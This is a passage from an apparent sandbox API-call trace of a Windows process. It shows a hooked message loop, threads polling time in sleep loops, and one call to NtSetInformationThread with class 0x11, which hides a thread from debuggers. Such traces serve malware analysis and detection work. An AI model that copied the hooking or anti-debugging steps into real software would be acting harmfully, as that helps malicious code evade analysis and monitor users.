wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0240.451] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0240.451] WaitMessage () [0243.740] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0243.740] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0243.740] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0243.740] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0243.741] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0243.741] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0243.741] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0243.741] ResumeThread (hThread=0x260) returned 0x0 [0243.741] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0243.741] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0243.741] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0243.741] WaitMessage () returned 1 [0247.039] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0247.039] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0247.040] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0247.040] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0247.040] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0247.040] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0247.040] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0247.040] ResumeThread (hThread=0x260) returned 0x0 [0247.040] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0247.040] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0247.040] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0247.040] WaitMessage () returned 1 [0250.336] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0250.336] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0250.336] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0250.337] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0250.337] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0250.337] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0250.337] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0250.337] ResumeThread (hThread=0x260) returned 0x0 [0250.337] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0250.337] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0250.337] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0250.337] WaitMessage () returned 1 [0253.635] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0253.635] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0253.635] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0253.635] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0253.635] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0253.635] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0253.635] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0253.636] ResumeThread (hThread=0x260) returned 0x0 [0253.636] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0253.636] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0253.636] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0253.636] WaitMessage () returned 1 [0256.934] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0256.934] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0256.934] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0256.934] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0256.934] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0256.934] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0256.934] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0256.934] ResumeThread (hThread=0x260) returned 0x0 [0256.934] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0256.934] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0256.935] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0256.935] WaitMessage () [0260.229] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0260.230] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0260.230] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0260.230] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0260.230] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0260.230] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0260.230] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0260.230] ResumeThread (hThread=0x260) returned 0x0 [0260.230] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0260.230] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0260.230] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0260.230] WaitMessage () returned 1 [0263.518] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0263.518] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0263.518] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0263.518] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0263.518] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0263.518] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0263.518] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0263.518] ResumeThread (hThread=0x260) returned 0x0 [0263.519] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0263.519] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0263.519] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0263.519] WaitMessage () [0266.817] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0266.817] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0266.817] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0266.817] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0266.817] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0266.818] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0266.818] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0266.818] ResumeThread (hThread=0x260) returned 0x0 [0266.818] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0266.818] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0266.818] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0266.818] WaitMessage () [0270.114] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0270.114] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0270.114] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0270.114] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0270.114] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0270.114] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0270.114] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0270.114] ResumeThread (hThread=0x260) returned 0x0 [0270.114] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0270.115] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0270.115] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0270.115] WaitMessage () [0273.415] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0273.415] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0273.415] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0273.416] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0273.416] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0273.416] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0273.416] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0273.416] ResumeThread (hThread=0x260) returned 0x0 [0273.416] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0273.416] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0273.416] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0273.416] WaitMessage () Thread: id = 2 os_tid = 0x13f4 Thread: id = 3 os_tid = 0x7b0 [0052.816] GetTickCount () returned 0x114ecb3 [0052.816] Sleep (dwMilliseconds=0x3e8) [0053.883] Sleep (dwMilliseconds=0x3e8) [0054.999] Sleep (dwMilliseconds=0x3e8) [0056.280] Sleep (dwMilliseconds=0x3e8) [0057.459] Sleep (dwMilliseconds=0x3e8) [0058.538] Sleep (dwMilliseconds=0x3e8) [0059.550] Sleep (dwMilliseconds=0x3e8) [0060.556] Sleep (dwMilliseconds=0x3e8) [0061.619] Sleep (dwMilliseconds=0x3e8) [0062.687] Sleep (dwMilliseconds=0x3e8) [0063.776] Sleep (dwMilliseconds=0x3e8) [0064.812] Sleep (dwMilliseconds=0x3e8) [0065.926] Sleep (dwMilliseconds=0x3e8) [0067.244] Sleep (dwMilliseconds=0x3e8) [0068.281] Sleep (dwMilliseconds=0x3e8) [0069.401] Sleep (dwMilliseconds=0x3e8) [0071.042] Sleep (dwMilliseconds=0x3e8) [0072.248] Sleep (dwMilliseconds=0x3e8) [0073.357] Sleep (dwMilliseconds=0x3e8) [0074.415] Sleep (dwMilliseconds=0x3e8) [0075.440] Sleep (dwMilliseconds=0x3e8) [0076.526] Sleep (dwMilliseconds=0x3e8) [0077.696] Sleep (dwMilliseconds=0x3e8) [0078.716] Sleep (dwMilliseconds=0x3e8) [0079.773] Sleep (dwMilliseconds=0x3e8) [0081.017] Sleep (dwMilliseconds=0x3e8) [0082.291] Sleep (dwMilliseconds=0x3e8) [0083.886] Sleep (dwMilliseconds=0x3e8) [0085.024] Sleep (dwMilliseconds=0x3e8) [0086.304] Sleep (dwMilliseconds=0x3e8) [0087.603] Sleep (dwMilliseconds=0x3e8) [0089.138] Sleep (dwMilliseconds=0x3e8) [0090.327] Sleep (dwMilliseconds=0x3e8) [0092.972] Sleep (dwMilliseconds=0x3e8) [0094.047] Sleep (dwMilliseconds=0x3e8) [0095.062] Sleep (dwMilliseconds=0x3e8) [0096.317] Sleep (dwMilliseconds=0x3e8) [0098.276] Sleep (dwMilliseconds=0x3e8) [0099.297] Sleep (dwMilliseconds=0x3e8) [0100.333] Sleep (dwMilliseconds=0x3e8) [0101.556] Sleep (dwMilliseconds=0x3e8) [0102.889] Sleep (dwMilliseconds=0x3e8) [0103.968] Sleep (dwMilliseconds=0x3e8) [0105.042] Sleep (dwMilliseconds=0x3e8) [0106.352] Sleep (dwMilliseconds=0x3e8) [0107.654] Sleep (dwMilliseconds=0x3e8) [0109.193] Sleep (dwMilliseconds=0x3e8) [0110.403] Sleep (dwMilliseconds=0x3e8) [0111.655] Sleep (dwMilliseconds=0x3e8) [0112.868] Sleep (dwMilliseconds=0x3e8) [0114.210] Sleep (dwMilliseconds=0x3e8) [0115.898] Sleep (dwMilliseconds=0x3e8) [0117.037] Sleep (dwMilliseconds=0x3e8) [0118.342] Sleep (dwMilliseconds=0x3e8) [0119.570] Sleep (dwMilliseconds=0x3e8) [0120.788] Sleep (dwMilliseconds=0x3e8) [0121.886] Sleep (dwMilliseconds=0x3e8) [0122.976] Sleep (dwMilliseconds=0x3e8) [0124.132] Sleep (dwMilliseconds=0x3e8) [0125.164] Sleep (dwMilliseconds=0x3e8) [0126.210] Sleep (dwMilliseconds=0x3e8) [0127.440] GetLocalTime (in: lpSystemTime=0x315fcac | out: lpSystemTime=0x315fcac*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x18, wMilliseconds=0x367)) [0127.440] Sleep (dwMilliseconds=0x3e8) [0128.624] Sleep (dwMilliseconds=0x3e8) [0129.923] Sleep (dwMilliseconds=0x3e8) [0131.077] Sleep (dwMilliseconds=0x3e8) [0132.262] Sleep (dwMilliseconds=0x3e8) [0133.897] Sleep (dwMilliseconds=0x3e8) [0135.068] Sleep (dwMilliseconds=0x3e8) [0137.111] Sleep (dwMilliseconds=0x3e8) [0138.293] Sleep (dwMilliseconds=0x3e8) [0139.368] Sleep (dwMilliseconds=0x3e8) [0140.398] Sleep (dwMilliseconds=0x3e8) [0141.499] Sleep (dwMilliseconds=0x3e8) [0142.530] Sleep (dwMilliseconds=0x3e8) [0143.707] Sleep (dwMilliseconds=0x3e8) [0144.931] Sleep (dwMilliseconds=0x3e8) [0146.073] Sleep (dwMilliseconds=0x3e8) [0147.130] Sleep (dwMilliseconds=0x3e8) [0148.564] Sleep (dwMilliseconds=0x3e8) [0149.695] Sleep (dwMilliseconds=0x3e8) [0150.737] Sleep (dwMilliseconds=0x3e8) [0151.848] Sleep (dwMilliseconds=0x3e8) [0152.948] Sleep (dwMilliseconds=0x3e8) [0153.975] Sleep (dwMilliseconds=0x3e8) [0155.105] Sleep (dwMilliseconds=0x3e8) [0156.209] Sleep (dwMilliseconds=0x3e8) [0157.250] Sleep (dwMilliseconds=0x3e8) [0158.325] Sleep (dwMilliseconds=0x3e8) [0159.450] Sleep (dwMilliseconds=0x3e8) [0160.626] Sleep (dwMilliseconds=0x3e8) [0161.636] Sleep (dwMilliseconds=0x3e8) [0162.698] Sleep (dwMilliseconds=0x3e8) [0163.716] Sleep (dwMilliseconds=0x3e8) [0164.747] Sleep (dwMilliseconds=0x3e8) [0165.976] Sleep (dwMilliseconds=0x3e8) [0167.135] Sleep (dwMilliseconds=0x3e8) [0168.223] Sleep (dwMilliseconds=0x3e8) [0169.238] Sleep (dwMilliseconds=0x3e8) [0170.305] Sleep (dwMilliseconds=0x3e8) [0171.318] Sleep (dwMilliseconds=0x3e8) [0172.327] Sleep (dwMilliseconds=0x3e8) [0173.368] Sleep (dwMilliseconds=0x3e8) [0174.424] Sleep (dwMilliseconds=0x3e8) [0175.445] Sleep (dwMilliseconds=0x3e8) [0176.456] Sleep (dwMilliseconds=0x3e8) [0177.516] Sleep (dwMilliseconds=0x3e8) [0178.562] Sleep (dwMilliseconds=0x3e8) [0179.596] Sleep (dwMilliseconds=0x3e8) [0180.703] Sleep (dwMilliseconds=0x3e8) [0181.838] Sleep (dwMilliseconds=0x3e8) [0182.904] Sleep (dwMilliseconds=0x3e8) [0183.954] Sleep (dwMilliseconds=0x3e8) [0184.968] Sleep (dwMilliseconds=0x3e8) [0186.017] Sleep (dwMilliseconds=0x3e8) [0187.110] Sleep (dwMilliseconds=0x3e8) [0188.273] Sleep (dwMilliseconds=0x3e8) [0189.343] Sleep (dwMilliseconds=0x3e8) [0190.399] Sleep (dwMilliseconds=0x3e8) [0191.439] Sleep (dwMilliseconds=0x3e8) [0192.525] Sleep (dwMilliseconds=0x3e8) [0193.548] Sleep (dwMilliseconds=0x3e8) [0194.633] GetLocalTime (in: lpSystemTime=0x315fcac | out: lpSystemTime=0x315fcac*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2a, wSecond=0x20, wMilliseconds=0x39)) [0194.633] Sleep (dwMilliseconds=0x3e8) [0195.657] Sleep (dwMilliseconds=0x3e8) [0196.770] Sleep (dwMilliseconds=0x3e8) [0197.851] Sleep (dwMilliseconds=0x3e8) [0198.900] Sleep (dwMilliseconds=0x3e8) [0199.913] Sleep (dwMilliseconds=0x3e8) [0200.950] Sleep (dwMilliseconds=0x3e8) [0201.974] Sleep (dwMilliseconds=0x3e8) [0202.987] Sleep (dwMilliseconds=0x3e8) [0204.007] Sleep (dwMilliseconds=0x3e8) [0205.294] Sleep (dwMilliseconds=0x3e8) [0206.305] Sleep (dwMilliseconds=0x3e8) [0207.341] Sleep (dwMilliseconds=0x3e8) [0208.501] Sleep (dwMilliseconds=0x3e8) [0209.571] Sleep (dwMilliseconds=0x3e8) [0210.601] Sleep (dwMilliseconds=0x3e8) [0211.650] Sleep (dwMilliseconds=0x3e8) [0212.662] Sleep (dwMilliseconds=0x3e8) [0213.695] Sleep (dwMilliseconds=0x3e8) [0214.710] Sleep (dwMilliseconds=0x3e8) [0215.726] Sleep (dwMilliseconds=0x3e8) [0216.734] Sleep (dwMilliseconds=0x3e8) [0217.753] Sleep (dwMilliseconds=0x3e8) [0218.813] Sleep (dwMilliseconds=0x3e8) [0219.827] Sleep (dwMilliseconds=0x3e8) [0220.843] Sleep (dwMilliseconds=0x3e8) [0221.874] Sleep (dwMilliseconds=0x3e8) [0222.882] Sleep (dwMilliseconds=0x3e8) [0223.899] Sleep (dwMilliseconds=0x3e8) [0224.913] Sleep (dwMilliseconds=0x3e8) [0225.932] Sleep (dwMilliseconds=0x3e8) [0226.947] Sleep (dwMilliseconds=0x3e8) [0227.995] Sleep (dwMilliseconds=0x3e8) [0229.149] Sleep (dwMilliseconds=0x3e8) [0230.184] Sleep (dwMilliseconds=0x3e8) [0231.235] Sleep (dwMilliseconds=0x3e8) [0232.287] Sleep (dwMilliseconds=0x3e8) [0233.303] Sleep (dwMilliseconds=0x3e8) [0234.334] Sleep (dwMilliseconds=0x3e8) [0235.343] Sleep (dwMilliseconds=0x3e8) [0236.356] Sleep (dwMilliseconds=0x3e8) [0237.391] Sleep (dwMilliseconds=0x3e8) [0238.405] Sleep (dwMilliseconds=0x3e8) [0239.423] Sleep (dwMilliseconds=0x3e8) [0240.435] Sleep (dwMilliseconds=0x3e8) [0241.438] Sleep (dwMilliseconds=0x3e8) [0242.652] Sleep (dwMilliseconds=0x3e8) [0243.662] Sleep (dwMilliseconds=0x3e8) [0244.679] Sleep (dwMilliseconds=0x3e8) [0245.693] Sleep (dwMilliseconds=0x3e8) [0246.696] Sleep (dwMilliseconds=0x3e8) [0247.711] Sleep (dwMilliseconds=0x3e8) [0248.729] Sleep (dwMilliseconds=0x3e8) [0249.744] Sleep (dwMilliseconds=0x3e8) [0250.758] Sleep (dwMilliseconds=0x3e8) [0251.766] Sleep (dwMilliseconds=0x3e8) [0252.783] Sleep (dwMilliseconds=0x3e8) [0253.791] Sleep (dwMilliseconds=0x3e8) [0254.807] Sleep (dwMilliseconds=0x3e8) [0255.822] Sleep (dwMilliseconds=0x3e8) [0256.824] GetLocalTime (in: lpSystemTime=0x315fcac | out: lpSystemTime=0x315fcac*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x2b, wSecond=0x22, wMilliseconds=0x100)) [0256.824] Sleep (dwMilliseconds=0x3e8) [0257.840] Sleep (dwMilliseconds=0x3e8) [0258.874] Sleep (dwMilliseconds=0x3e8) [0259.904] Sleep (dwMilliseconds=0x3e8) [0260.967] Sleep (dwMilliseconds=0x3e8) [0262.000] Sleep (dwMilliseconds=0x3e8) [0263.002] Sleep (dwMilliseconds=0x3e8) [0264.049] Sleep (dwMilliseconds=0x3e8) [0265.091] Sleep (dwMilliseconds=0x3e8) [0266.127] Sleep (dwMilliseconds=0x3e8) [0267.157] Sleep (dwMilliseconds=0x3e8) [0268.162] Sleep (dwMilliseconds=0x3e8) [0269.225] Sleep (dwMilliseconds=0x3e8) [0270.287] Sleep (dwMilliseconds=0x3e8) [0271.302] Sleep (dwMilliseconds=0x3e8) [0272.362] Sleep (dwMilliseconds=0x3e8) [0273.384] Sleep (dwMilliseconds=0x3e8) [0274.431] Sleep (dwMilliseconds=0x3e8) [0275.447] Sleep (dwMilliseconds=0x3e8) Thread: id = 4 os_tid = 0x980 [0053.589] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0053.589] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0053.589] GetProcAddress (hModule=0x74bc0000, lpProcName="EncodePointer") returned 0x779d29e0 [0053.590] GetProcAddress (hModule=0x74bc0000, lpProcName="DecodePointer") returned 0x779d1ec0 [0053.590] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xb, wMilliseconds=0x9)) [0053.590] GetTickCount () returned 0x114efb0 [0053.590] Sleep (dwMilliseconds=0x3e8) [0054.686] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xc, wMilliseconds=0x67)) [0054.686] GetTickCount () returned 0x114f3f6 [0054.686] Sleep (dwMilliseconds=0x3e8) [0056.280] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xd, wMilliseconds=0x2ba)) [0056.280] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0056.280] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0056.280] GetCurrentThread () returned 0xfffffffe [0056.280] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0056.280] GetTickCount () returned 0x114fa40 [0056.280] Sleep (dwMilliseconds=0x3e8) [0057.459] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xe, wMilliseconds=0x376)) [0057.459] GetTickCount () returned 0x114fee3 [0057.459] Sleep (dwMilliseconds=0x3e8) [0058.538] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0xf, wMilliseconds=0x3c4)) [0058.538] GetTickCount () returned 0x1150319 [0058.538] Sleep (dwMilliseconds=0x3e8) [0059.550] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x10, wMilliseconds=0x3d3)) [0059.550] GetTickCount () returned 0x1150711 [0059.550] Sleep (dwMilliseconds=0x3e8) [0060.630] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x12, wMilliseconds=0x3e)) [0060.630] GetTickCount () returned 0x1150b47 [0060.630] Sleep (dwMilliseconds=0x3e8) [0061.732] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x13, wMilliseconds=0xa0)) [0061.732] GetTickCount () returned 0x1150f8d [0061.732] Sleep (dwMilliseconds=0x3e8) [0062.776] 